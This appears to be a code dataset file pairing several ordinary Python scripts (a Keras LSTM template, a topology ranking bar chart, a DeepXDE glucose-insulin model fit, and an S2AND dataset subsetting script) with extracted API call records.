((10456, 10523), 'matplotlib.pyplot.plot', 'plt.plot', (['aligned[0]', '""","""'], {'label': "('aligned ' + name)", 'color': 'new_color'}), "(aligned[0], ',', label='aligned ' + name, color=new_color)\n", (10464, 10523), True, 'import matplotlib.pyplot as plt\n'), ((10538, 10550), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (10548, 10550), True, 'import matplotlib.pyplot as plt\n'), ((10563, 10587), 'matplotlib.pyplot.title', 'plt.title', (['self.eis_name'], {}), '(self.eis_name)\n', (10572, 10587), True, 'import matplotlib.pyplot as plt\n'), ((10600, 10627), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""slit position"""'], {}), "('slit position')\n", (10610, 10627), True, 'import matplotlib.pyplot as plt\n'), ((10640, 10670), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (["(name + ' 
[arcsec]')"], {}), "(name + ' [arcsec]')\n", (10650, 10670), True, 'import matplotlib.pyplot as plt\n'), ((10683, 10698), 'matplotlib.pyplot.savefig', 'plt.savefig', (['pp'], {}), '(pp)\n', (10694, 10698), True, 'import matplotlib.pyplot as plt\n'), ((14234, 14243), 'numpy.max', 'np.max', (['x'], {}), '(x)\n', (14240, 14243), True, 'import numpy as np\n'), ((14246, 14255), 'numpy.min', 'np.min', (['x'], {}), '(x)\n', (14252, 14255), True, 'import numpy as np\n'), ((14277, 14286), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (14283, 14286), True, 'import numpy as np\n'), ((14289, 14298), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14295, 14298), True, 'import numpy as np\n'), ((14812, 14829), 'numpy.min', 'np.min', (['dates_abs'], {}), '(dates_abs)\n', (14818, 14829), True, 'import numpy as np\n'), ((14831, 14848), 'numpy.max', 'np.max', (['dates_abs'], {}), '(dates_abs)\n', (14837, 14848), True, 'import numpy as np\n'), ((2108, 2144), 'numpy.array', 'np.array', (['self.offsets'], {'dtype': 'object'}), '(self.offsets, dtype=object)\n', (2116, 2144), True, 'import numpy as np\n'), ((2161, 2208), 'numpy.array', 'np.array', (['self.cross_correlations'], {'dtype': 'object'}), '(self.cross_correlations, dtype=object)\n', (2169, 2208), True, 'import numpy as np\n'), ((3014, 3057), 'os.path.join', 'os.path.join', (['self.verif_dir', '"""summary.yml"""'], {}), "(self.verif_dir, 'summary.yml')\n", (3026, 3057), False, 'import os\n'), ((5787, 5818), 'numpy.meshgrid', 'np.meshgrid', (['x_interp', 'y_interp'], {}), '(x_interp, y_interp)\n', (5798, 5818), True, 'import numpy as np\n'), ((6785, 6804), 'numpy.nanstd', 'np.nanstd', (['arr_stat'], {}), '(arr_stat)\n', (6794, 6804), True, 'import numpy as np\n'), ((7001, 7018), 'numpy.nanmin', 'np.nanmin', (['(a, b)'], {}), '((a, b))\n', (7010, 7018), True, 'import numpy as np\n'), ((7025, 7042), 'numpy.nanmax', 'np.nanmax', (['(a, b)'], {}), '((a, b))\n', (7034, 7042), True, 'import numpy as np\n'), ((8140, 8149), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (8147, 8149), True, 'import matplotlib.pyplot as plt\n'), ((8573, 8585), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', (8579, 8585), True, 'import numpy as np\n'), ((9319, 9384), 'warnings.warn', 'warnings.warn', (['"""Multiple slitshift steps. Plotting the first one"""'], {}), "('Multiple slitshift steps. Plotting the first one')\n", (9332, 9384), False, 'import warnings\n'), ((14946, 14963), 'numpy.min', 'np.min', (['dates_abs'], {}), '(dates_abs)\n', (14952, 14963), True, 'import numpy as np\n'), ((14965, 14982), 'numpy.max', 'np.max', (['dates_abs'], {}), '(dates_abs)\n', (14971, 14982), True, 'import numpy as np\n'), ((4628, 4641), 'numpy.nanmax', 'np.nanmax', (['cc'], {}), '(cc)\n', (4637, 4641), True, 'import numpy as np\n'), ((6761, 6781), 'numpy.nanmean', 'np.nanmean', (['arr_stat'], {}), '(arr_stat)\n', (6771, 6781), True, 'import numpy as np\n'), ((9141, 9157), 'numpy.array', 'np.array', (['offset'], {}), '(offset)\n', (9149, 9157), True, 'import numpy as np\n')]
|
#A template for when we actually build the model.
import numpy as np
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras import Sequential
categories = [] #List out category string names here
reproducibility = 7 #Constant seed for reproducibility
np.random.seed(reproducibility)
#Load the data here (e.g. unpickle a preprocessed dataset) so that x holds the features and y the one-hot labels
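#For example (illustrative sketch only -- "data.pkl" and its layout are assumptions, not part of this template):
#import pickle
#with open("data.pkl", "rb") as f:
#    x, y = pickle.load(f)  # x: feature array, y: one-hot encoded labels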
train_x,test_x,train_y,test_y = train_test_split(x,y,
test_size=0.2,random_state=reproducibility)
model = Sequential()
#Layers will go here
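#For example (an illustrative sketch, not a prescribed architecture; "timesteps" and "features" are placeholders for the data's shape):
#model.add(LSTM(128, input_shape=(timesteps, features)))
#model.add(Dropout(0.2))
#model.add(Dense(64, activation="relu"))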
#Compile for multi-class classification, hence categorical cross-entropy.
model.add(Dense(len(categories),activation="softmax"))
model.compile(optimizer="adam",
loss="categorical_crossentropy",metrics=['accuracy'])
#--
bsize=64
epochs=1000
#--
model.fit(x=train_x,y=train_y, verbose=1,
validation_data=(test_x,test_y),batch_size=bsize,epochs=epochs)
|
[
"sklearn.model_selection.train_test_split",
"tensorflow.keras.Sequential",
"numpy.random.seed"
] |
[((327, 358), 'numpy.random.seed', 'np.random.seed', (['reproducibility'], {}), '(reproducibility)\n', (341, 358), True, 'import numpy as np\n'), ((451, 518), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x', 'y'], {'test_size': '(0.2)', 'random_state': 'reproducibility'}), '(x, y, test_size=0.2, random_state=reproducibility)\n', (467, 518), False, 'from sklearn.model_selection import train_test_split\n'), ((557, 569), 'tensorflow.keras.Sequential', 'Sequential', ([], {}), '()\n', (567, 569), False, 'from tensorflow.keras import Sequential\n')]
|
# -*- coding: utf-8 -*-
"""
============================================================================
Authors:
<NAME> and <NAME>*
*Department of Informatics
Universidad Nacional de San Antonio Abad del Cusco (UNSAAC) - Perú
============================================================================
"""
# Python: 3.8.x
"""
Script to evaluate the best topology (static and dynamic) with respect to convergence
"""
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter # useful for `logit` scale
import numpy as np
from utils import topology, dataset
print("******* START *******")
dataset_topology = [
[9, 5, 2, 3, 7, 8, 4, 1, 6], # d 20
[], # d 21
[5, 7, 2, 6, 8, 9, 3, 1, 4], # d 22
[9, 5, 1, 2, 8, 3, 4, 6, 7], # d 23
[8, 7, 1, 5, 2, 4, 3, 6, 9], # d 24
[7, 8, 1, 5, 6, 4, 2, 3, 9], # d 25
[9, 8, 4, 5, 1, 2, 6, 7, 3], # d 26
[7, 4, 1, 2, 8, 9, 3, 5, 6], # d 27
[8, 6, 3, 4, 5, 7, 1, 2, 9], # d 28
[] # d 29
]
rankig_low = [] # ranking metric for the low-size datasets
rankig_high = [] # ranking metric for the high-size datasets
rankig_all = [] # ranking metric for both low- and high-size datasets
for index, index_topology in enumerate([0, 1, 2, 3, 4, 5, 6, 7, 8]): # change [0, 1, 2, 3, 4, 5, 6, 7, 8]
# load data for plot
rankig_l = []
rankig_h = []
rankig_a = []
for index_dataset in [20, 22, 23, 24, 25, 26, 27, 28]: # change [0, ..., 29]
if index_dataset >= 26:
rankig_h.append(dataset_topology[index_dataset - 20][index])
else:
rankig_l.append(dataset_topology[index_dataset - 20][index])
rankig_a.append(dataset_topology[index_dataset - 20][index])
rankig_low.append(np.sum(rankig_l))
rankig_high.append(np.sum(rankig_h))
rankig_all.append(np.sum(rankig_a))
labels = topology
# rankig_low = [20, 34, 30, 35, 27]
# rankig_high = [25, 32, 34, 20, 25]
x = np.arange(len(labels)) # the label locations
width = 0.25 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.bar(x - width / 2, rankig_low, width, label='Low size')
rects2 = ax.bar(x + width / 2, rankig_high, width, label='High size')
"""rects1 = ax.bar(x - width, rankig_low, width, label='Low size')
rects2 = ax.bar(x, rankig_high, width, label='High size')
rects3 = ax.bar(x + width, rankig_all, width, label='All') """
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel("Scores")
ax.set_xlabel("Topology")
ax.set_title("Best Topology")
ax.set_xticks(x)
ax.set_xticklabels(labels)
ax.legend()
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
autolabel(rects2)
# autolabel(rects3)
fig.tight_layout()
plt.grid()
plt.show()
print("******* END *******")
# Run:
# python graphic_convergence_topology.py
|
[
"numpy.sum",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] |
[((1903, 1917), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1915, 1917), True, 'import matplotlib.pyplot as plt\n'), ((2959, 2969), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (2967, 2969), True, 'import matplotlib.pyplot as plt\n'), ((2970, 2980), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2978, 2980), True, 'import matplotlib.pyplot as plt\n'), ((1618, 1634), 'numpy.sum', 'np.sum', (['rankig_l'], {}), '(rankig_l)\n', (1624, 1634), True, 'import numpy as np\n'), ((1656, 1672), 'numpy.sum', 'np.sum', (['rankig_h'], {}), '(rankig_h)\n', (1662, 1672), True, 'import numpy as np\n'), ((1693, 1709), 'numpy.sum', 'np.sum', (['rankig_a'], {}), '(rankig_a)\n', (1699, 1709), True, 'import numpy as np\n')]
|
import numpy as np
import deepxde as dde
from deepxde.backend import tf
import variable_to_parameter_transform
def sbinn(data_t, data_y, meal_t, meal_q):
def get_variable(v, var):
low, up = v * 0.2, v * 1.8
l = (up - low) / 2
v1 = l * tf.tanh(var) + l + low
return v1
E_ = dde.Variable(0.0)
tp_ = dde.Variable(0.0)
ti_ = dde.Variable(0.0)
td_ = dde.Variable(0.0)
k_ = dde.Variable(0.0)
Rm_ = dde.Variable(0.0)
a1_ = dde.Variable(0.0)
C1_ = dde.Variable(0.0)
C2_ = dde.Variable(0.0)
C4_ = dde.Variable(0.0)
C5_ = dde.Variable(0.0)
Ub_ = dde.Variable(0.0)
U0_ = dde.Variable(0.0)
Um_ = dde.Variable(0.0)
Rg_ = dde.Variable(0.0)
alpha_ = dde.Variable(0.0)
beta_ = dde.Variable(0.0)
var_list_ = [
E_,
tp_,
ti_,
td_,
k_,
Rm_,
a1_,
C1_,
C2_,
C4_,
C5_,
Ub_,
U0_,
Um_,
Rg_,
alpha_,
beta_,
]
def ODE(t, y):
Ip = y[:, 0:1]
Ii = y[:, 1:2]
G = y[:, 2:3]
h1 = y[:, 3:4]
h2 = y[:, 4:5]
h3 = y[:, 5:6]
Vp = 3
Vi = 11
Vg = 10
E = (tf.tanh(E_) + 1) * 0.1 + 0.1
tp = (tf.tanh(tp_) + 1) * 2 + 4
ti = (tf.tanh(ti_) + 1) * 40 + 60
td = (tf.tanh(td_) + 1) * 25 / 6 + 25 / 3
k = get_variable(0.0083, k_)
Rm = get_variable(209, Rm_)
a1 = get_variable(6.6, a1_)
C1 = get_variable(300, C1_)
C2 = get_variable(144, C2_)
C3 = 100
C4 = get_variable(80, C4_)
C5 = get_variable(26, C5_)
Ub = get_variable(72, Ub_)
U0 = get_variable(4, U0_)
Um = get_variable(90, Um_)
Rg = get_variable(180, Rg_)
alpha = get_variable(7.5, alpha_)
beta = get_variable(1.772, beta_)
f1 = Rm * tf.math.sigmoid(G / (Vg * C1) - a1)
f2 = Ub * (1 - tf.math.exp(-G / (Vg * C2)))
kappa = (1 / Vi + 1 / (E * ti)) / C4
f3 = (U0 + Um / (1 + tf.pow(tf.maximum(kappa * Ii, 1e-3), -beta))) / (Vg * C3)
f4 = Rg * tf.sigmoid(alpha * (1 - h3 / (Vp * C5)))
dt = t - meal_t
IG = tf.math.reduce_sum(
0.5 * meal_q * k * tf.math.exp(-k * dt) * (tf.math.sign(dt) + 1),
axis=1,
keepdims=True,
)
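        # 0.5 * (sign(dt) + 1) acts as a step function, so only meals with meal_t <= t contribute;
        # each meal's contribution decays exponentially at rate k after ingestion.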
tmp = E * (Ip / Vp - Ii / Vi)
dIP_dt = dde.grad.jacobian(y, t, i=0, j=0)
dIi_dt = dde.grad.jacobian(y, t, i=1, j=0)
dG_dt = dde.grad.jacobian(y, t, i=2, j=0)
dh1_dt = dde.grad.jacobian(y, t, i=3, j=0)
dh2_dt = dde.grad.jacobian(y, t, i=4, j=0)
dh3_dt = dde.grad.jacobian(y, t, i=5, j=0)
return [
dIP_dt - (f1 - tmp - Ip / tp),
dIi_dt - (tmp - Ii / ti),
dG_dt - (f4 + IG - f2 - f3 * G),
dh1_dt - (Ip - h1) / td,
dh2_dt - (h1 - h2) / td,
dh3_dt - (h2 - h3) / td,
]
geom = dde.geometry.TimeDomain(data_t[0, 0], data_t[-1, 0])
# Observes
n = len(data_t)
idx = np.append(
np.random.choice(np.arange(1, n - 1), size=n // 5, replace=False), [0, n - 1]
)
observe_y2 = dde.PointSetBC(data_t[idx], data_y[idx, 2:3], component=2)
np.savetxt("glucose_input.dat", np.hstack((data_t[idx], data_y[idx, 2:3])))
data = dde.data.PDE(geom, ODE, [observe_y2], anchors=data_t)
net = dde.maps.FNN([1] + [128] * 3 + [6], "swish", "Glorot normal")
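    # feature_transform below rescales time and expands it into sinusoidal features
    # (a Fourier-style input embedding) before it is fed to the network.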
def feature_transform(t):
t = 0.01 * t
return tf.concat(
(t, tf.sin(t), tf.sin(2 * t), tf.sin(3 * t), tf.sin(4 * t), tf.sin(5 * t)),
axis=1,
)
net.apply_feature_transform(feature_transform)
def output_transform(t, y):
idx = 1799
k = (data_y[idx] - data_y[0]) / (data_t[idx] - data_t[0])
b = (data_t[idx] * data_y[0] - data_t[0] * data_y[idx]) / (
data_t[idx] - data_t[0]
)
linear = k * t + b
factor = tf.math.tanh(t) * tf.math.tanh(idx - t)
return linear + factor * tf.constant([1, 1, 1e2, 1, 1, 1]) * y
net.apply_output_transform(output_transform)
model = dde.Model(data, net)
firsttrain = 10000
callbackperiod = 1000
maxepochs = 1000000
model.compile("adam", lr=1e-3, loss_weights=[0, 0, 0, 0, 0, 0, 1e-2])
model.train(epochs=firsttrain, display_every=1000)
model.compile(
"adam",
lr=1e-3,
loss_weights=[1, 1, 1e-2, 1, 1, 1, 1e-2],
external_trainable_variables=var_list_,
)
variablefilename = "variables.csv"
variable = dde.callbacks.VariableValue(
var_list_, period=callbackperiod, filename=variablefilename
)
losshistory, train_state = model.train(
epochs=maxepochs, display_every=1000, callbacks=[variable]
)
dde.saveplot(losshistory, train_state, issave=True, isplot=True)
gluc_data = np.hsplit(np.loadtxt("glucose.dat"), [1])
meal_data = np.hsplit(np.loadtxt("meal.dat"), [4])
t = gluc_data[0]
y = gluc_data[1]
meal_t = meal_data[0]
meal_q = meal_data[1]
sbinn(
t[:1800],
y[:1800],
meal_t,
meal_q,
)
variable_to_parameter_transform.variable_file(10000, 1000, 1000000, "variables.csv")
|
[
"deepxde.backend.tf.math.tanh",
"deepxde.data.PDE",
"deepxde.PointSetBC",
"deepxde.Variable",
"deepxde.Model",
"numpy.hstack",
"deepxde.backend.tf.constant",
"variable_to_parameter_transform.variable_file",
"deepxde.geometry.TimeDomain",
"deepxde.backend.tf.sigmoid",
"numpy.arange",
"deepxde.backend.tf.sin",
"deepxde.maps.FNN",
"deepxde.backend.tf.tanh",
"deepxde.backend.tf.math.exp",
"deepxde.backend.tf.math.sigmoid",
"deepxde.backend.tf.maximum",
"deepxde.grad.jacobian",
"deepxde.saveplot",
"deepxde.callbacks.VariableValue",
"deepxde.backend.tf.math.sign",
"numpy.loadtxt"
] |
[((5369, 5457), 'variable_to_parameter_transform.variable_file', 'variable_to_parameter_transform.variable_file', (['(10000)', '(1000)', '(1000000)', '"""variables.csv"""'], {}), "(10000, 1000, 1000000,\n 'variables.csv')\n", (5414, 5457), False, 'import variable_to_parameter_transform\n'), ((329, 346), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (341, 346), True, 'import deepxde as dde\n'), ((358, 375), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (370, 375), True, 'import deepxde as dde\n'), ((387, 404), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (399, 404), True, 'import deepxde as dde\n'), ((416, 433), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (428, 433), True, 'import deepxde as dde\n'), ((444, 461), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (456, 461), True, 'import deepxde as dde\n'), ((473, 490), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (485, 490), True, 'import deepxde as dde\n'), ((502, 519), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (514, 519), True, 'import deepxde as dde\n'), ((531, 548), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (543, 548), True, 'import deepxde as dde\n'), ((560, 577), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (572, 577), True, 'import deepxde as dde\n'), ((589, 606), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (601, 606), True, 'import deepxde as dde\n'), ((618, 635), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (630, 635), True, 'import deepxde as dde\n'), ((647, 664), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (659, 664), True, 'import deepxde as dde\n'), ((676, 693), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (688, 693), True, 'import deepxde as dde\n'), ((705, 722), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (717, 722), True, 'import deepxde as dde\n'), ((734, 751), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (746, 751), True, 'import deepxde as dde\n'), ((766, 783), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (778, 783), True, 'import deepxde as dde\n'), ((797, 814), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (809, 814), True, 'import deepxde as dde\n'), ((3123, 3175), 'deepxde.geometry.TimeDomain', 'dde.geometry.TimeDomain', (['data_t[0, 0]', 'data_t[-1, 0]'], {}), '(data_t[0, 0], data_t[-1, 0])\n', (3146, 3175), True, 'import deepxde as dde\n'), ((3349, 3407), 'deepxde.PointSetBC', 'dde.PointSetBC', (['data_t[idx]', 'data_y[idx, 2:3]'], {'component': '(2)'}), '(data_t[idx], data_y[idx, 2:3], component=2)\n', (3363, 3407), True, 'import deepxde as dde\n'), ((3505, 3558), 'deepxde.data.PDE', 'dde.data.PDE', (['geom', 'ODE', '[observe_y2]'], {'anchors': 'data_t'}), '(geom, ODE, [observe_y2], anchors=data_t)\n', (3517, 3558), True, 'import deepxde as dde\n'), ((3572, 3633), 'deepxde.maps.FNN', 'dde.maps.FNN', (['([1] + [128] * 3 + [6])', '"""swish"""', '"""Glorot normal"""'], {}), "([1] + [128] * 3 + [6], 'swish', 'Glorot normal')\n", (3584, 3633), True, 'import deepxde as dde\n'), ((4355, 4375), 'deepxde.Model', 'dde.Model', (['data', 'net'], {}), '(data, net)\n', (4364, 4375), True, 'import deepxde as dde\n'), ((4805, 4898), 'deepxde.callbacks.VariableValue', 'dde.callbacks.VariableValue', (['var_list_'], {'period': 'callbackperiod', 'filename': 'variablefilename'}), '(var_list_, period=callbackperiod, 
filename=\n variablefilename)\n', (4832, 4898), True, 'import deepxde as dde\n'), ((5037, 5101), 'deepxde.saveplot', 'dde.saveplot', (['losshistory', 'train_state'], {'issave': '(True)', 'isplot': '(True)'}), '(losshistory, train_state, issave=True, isplot=True)\n', (5049, 5101), True, 'import deepxde as dde\n'), ((5129, 5154), 'numpy.loadtxt', 'np.loadtxt', (['"""glucose.dat"""'], {}), "('glucose.dat')\n", (5139, 5154), True, 'import numpy as np\n'), ((5184, 5206), 'numpy.loadtxt', 'np.loadtxt', (['"""meal.dat"""'], {}), "('meal.dat')\n", (5194, 5206), True, 'import numpy as np\n'), ((2544, 2577), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(0)', 'j': '(0)'}), '(y, t, i=0, j=0)\n', (2561, 2577), True, 'import deepxde as dde\n'), ((2596, 2629), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(1)', 'j': '(0)'}), '(y, t, i=1, j=0)\n', (2613, 2629), True, 'import deepxde as dde\n'), ((2647, 2680), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(2)', 'j': '(0)'}), '(y, t, i=2, j=0)\n', (2664, 2680), True, 'import deepxde as dde\n'), ((2699, 2732), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(3)', 'j': '(0)'}), '(y, t, i=3, j=0)\n', (2716, 2732), True, 'import deepxde as dde\n'), ((2751, 2784), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(4)', 'j': '(0)'}), '(y, t, i=4, j=0)\n', (2768, 2784), True, 'import deepxde as dde\n'), ((2803, 2836), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(5)', 'j': '(0)'}), '(y, t, i=5, j=0)\n', (2820, 2836), True, 'import deepxde as dde\n'), ((3447, 3489), 'numpy.hstack', 'np.hstack', (['(data_t[idx], data_y[idx, 2:3])'], {}), '((data_t[idx], data_y[idx, 2:3]))\n', (3456, 3489), True, 'import numpy as np\n'), ((2006, 2041), 'deepxde.backend.tf.math.sigmoid', 'tf.math.sigmoid', (['(G / (Vg * C1) - a1)'], {}), '(G / (Vg * C1) - a1)\n', (2021, 2041), False, 'from deepxde.backend import tf\n'), ((2248, 2288), 'deepxde.backend.tf.sigmoid', 'tf.sigmoid', (['(alpha * (1 - h3 / (Vp * C5)))'], {}), '(alpha * (1 - h3 / (Vp * C5)))\n', (2258, 2288), False, 'from deepxde.backend import tf\n'), ((3263, 3282), 'numpy.arange', 'np.arange', (['(1)', '(n - 1)'], {}), '(1, n - 1)\n', (3272, 3282), True, 'import numpy as np\n'), ((4176, 4191), 'deepxde.backend.tf.math.tanh', 'tf.math.tanh', (['t'], {}), '(t)\n', (4188, 4191), False, 'from deepxde.backend import tf\n'), ((4194, 4215), 'deepxde.backend.tf.math.tanh', 'tf.math.tanh', (['(idx - t)'], {}), '(idx - t)\n', (4206, 4215), False, 'from deepxde.backend import tf\n'), ((2066, 2093), 'deepxde.backend.tf.math.exp', 'tf.math.exp', (['(-G / (Vg * C2))'], {}), '(-G / (Vg * C2))\n', (2077, 2093), False, 'from deepxde.backend import tf\n'), ((3733, 3742), 'deepxde.backend.tf.sin', 'tf.sin', (['t'], {}), '(t)\n', (3739, 3742), False, 'from deepxde.backend import tf\n'), ((3744, 3757), 'deepxde.backend.tf.sin', 'tf.sin', (['(2 * t)'], {}), '(2 * t)\n', (3750, 3757), False, 'from deepxde.backend import tf\n'), ((3759, 3772), 'deepxde.backend.tf.sin', 'tf.sin', (['(3 * t)'], {}), '(3 * t)\n', (3765, 3772), False, 'from deepxde.backend import tf\n'), ((3774, 3787), 'deepxde.backend.tf.sin', 'tf.sin', (['(4 * t)'], {}), '(4 * t)\n', (3780, 3787), False, 'from deepxde.backend import tf\n'), ((3789, 3802), 'deepxde.backend.tf.sin', 'tf.sin', (['(5 * t)'], {}), '(5 * t)\n', (3795, 3802), False, 'from deepxde.backend import tf\n'), ((275, 287), 'deepxde.backend.tf.tanh', 'tf.tanh', (['var'], {}), '(var)\n', (282, 287), 
False, 'from deepxde.backend import tf\n'), ((1315, 1326), 'deepxde.backend.tf.tanh', 'tf.tanh', (['E_'], {}), '(E_)\n', (1322, 1326), False, 'from deepxde.backend import tf\n'), ((1359, 1371), 'deepxde.backend.tf.tanh', 'tf.tanh', (['tp_'], {}), '(tp_)\n', (1366, 1371), False, 'from deepxde.backend import tf\n'), ((1400, 1412), 'deepxde.backend.tf.tanh', 'tf.tanh', (['ti_'], {}), '(ti_)\n', (1407, 1412), False, 'from deepxde.backend import tf\n'), ((2380, 2400), 'deepxde.backend.tf.math.exp', 'tf.math.exp', (['(-k * dt)'], {}), '(-k * dt)\n', (2391, 2400), False, 'from deepxde.backend import tf\n'), ((2404, 2420), 'deepxde.backend.tf.math.sign', 'tf.math.sign', (['dt'], {}), '(dt)\n', (2416, 2420), False, 'from deepxde.backend import tf\n'), ((4250, 4285), 'deepxde.backend.tf.constant', 'tf.constant', (['[1, 1, 100.0, 1, 1, 1]'], {}), '([1, 1, 100.0, 1, 1, 1])\n', (4261, 4285), False, 'from deepxde.backend import tf\n'), ((1443, 1455), 'deepxde.backend.tf.tanh', 'tf.tanh', (['td_'], {}), '(td_)\n', (1450, 1455), False, 'from deepxde.backend import tf\n'), ((2178, 2207), 'deepxde.backend.tf.maximum', 'tf.maximum', (['(kappa * Ii)', '(0.001)'], {}), '(kappa * Ii, 0.001)\n', (2188, 2207), False, 'from deepxde.backend import tf\n')]
|
import os
import json
import pickle
import collections
import numpy as np
from s2and.consts import CONFIG
DATA_DIR = CONFIG["main_data_dir"]
OUTPUT_DIR = os.path.join(DATA_DIR, "s2and_mini")
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
# excluding MEDLINE because it has no clusters
DATASETS = [
"aminer",
"arnetminer",
"inspire",
"kisti",
"pubmed",
"qian",
"zbmath",
]
BIG_BLOCK_CUTOFF = 500
TOP_BLOCKS_TO_KEEP = 1000
# load all of the artifacts of each dataset
clusters_all = []
signatures_all = []
X_all = []
keys_all = []
papers_all = []
for dataset in DATASETS:
print()
print(f"Loading data from {dataset}...")
for file_name in os.listdir(os.path.join(DATA_DIR, dataset)):
file_name = os.path.join(DATA_DIR, dataset, file_name)
if "specter" in file_name:
with open(file_name, "rb") as _pickle_file:
X, keys = pickle.load(_pickle_file)
X_all.append(X)
keys_all.append(keys)
elif "cluster" in file_name:
with open(file_name) as _json_file:
clusters = json.load(_json_file)
new_clusters = {}
for cluster_id, v in clusters.items():
new_cluster_id = f"{dataset}_{cluster_id}"
new_v = {
"cluster_id": new_cluster_id,
"signature_ids": [f"{dataset}_{i}" for i in v["signature_ids"]],
"model_version": v["model_version"],
}
new_clusters[new_cluster_id] = new_v
clusters_all.append(new_clusters)
elif "paper" in file_name:
with open(file_name) as _json_file:
papers = json.load(_json_file)
papers_all.append(papers)
elif "signature" in file_name:
with open(file_name) as _json_file:
signatures = json.load(_json_file)
new_signatures = {}
for signature_id, v in signatures.items():
new_signature_id = f"{dataset}_{signature_id}"
new_v = {
"author_id": v["author_id"], # maybe this needs to be prepended by dataset?
"paper_id": v["paper_id"],
"signature_id": new_signature_id,
"author_info": v["author_info"],
}
new_signatures[new_signature_id] = new_v
signatures_all.append(new_signatures)
else:
print(f"WARNING: Ignoring {file_name} in {dataset}")
print("Finished loading data. Filtering...")
# the goal is speed so we'll remove the largest blocks
# also only keep top 1000 blocks max
# aminer has 32k, inspire has 15k, and kisti has 7k blocks
for dataset, s, c, p, X, k in zip(DATASETS, signatures_all, clusters_all, papers_all, X_all, keys_all):
blocks = []
for v in s.values():
blocks.append(v["author_info"]["block"])
vc = collections.Counter(blocks)
blocks_to_keep = set([k for k, v in sorted(vc.items()) if v <= BIG_BLOCK_CUTOFF][:TOP_BLOCKS_TO_KEEP])
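    # blocks with more than BIG_BLOCK_CUTOFF signatures are dropped; of the rest, the first
    # TOP_BLOCKS_TO_KEEP in alphabetical order of block key are kept (sorted(vc.items()) sorts by key)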
s_filtered = {k: v for k, v in s.items() if v["author_info"]["block"] in blocks_to_keep}
# filter the clusters too
c_filtered = {k: v for k, v in c.items() if np.all([i in s_filtered for i in v["signature_ids"]])}
# go back through the clusters and find the signatures we'll actually need
# need to do this because sometimes the block name is just... corrupted
# e.g. "g miller" for most signatures but "g mller" for one...
signature_keys_to_keep = set()
for v in c_filtered.values():
signature_keys_to_keep.update(v["signature_ids"])
s_filtered = {k: v for k, v in s.items() if k in signature_keys_to_keep}
# we don't need all the papers anymore. just the ones in signatures
# also the references of those
paper_ids = set([v["paper_id"] for v in s_filtered.values()])
ref_paper_ids = set()
for v in p.values():
if v["references"] is not None:
ref_paper_ids.update(v["references"])
p_filtered = {k: v for k, v in p.items() if int(k) in paper_ids or int(k) in ref_paper_ids}
# filter down the specters to those in papers only since we don't use specters for references
keys_filtered_flag = np.array([i in paper_ids for i in k.astype(int)])
k_filtered = k[keys_filtered_flag]
X_filtered = X[keys_filtered_flag, :]
# save all of the data
data_output_dir = os.path.join(DATA_DIR, "s2and_mini", dataset)
if not os.path.exists(data_output_dir):
os.mkdir(data_output_dir)
with open(os.path.join(data_output_dir, f"{dataset}_clusters.json"), "w") as _json_file:
json.dump(c_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_signatures.json"), "w") as _json_file:
json.dump(s_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_papers.json"), "w") as _json_file:
json.dump(p_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_specter.pickle"), "wb") as _pickle_file:
pickle.dump((X_filtered, k_filtered), _pickle_file)
|
[
"os.path.exists",
"pickle.dump",
"os.path.join",
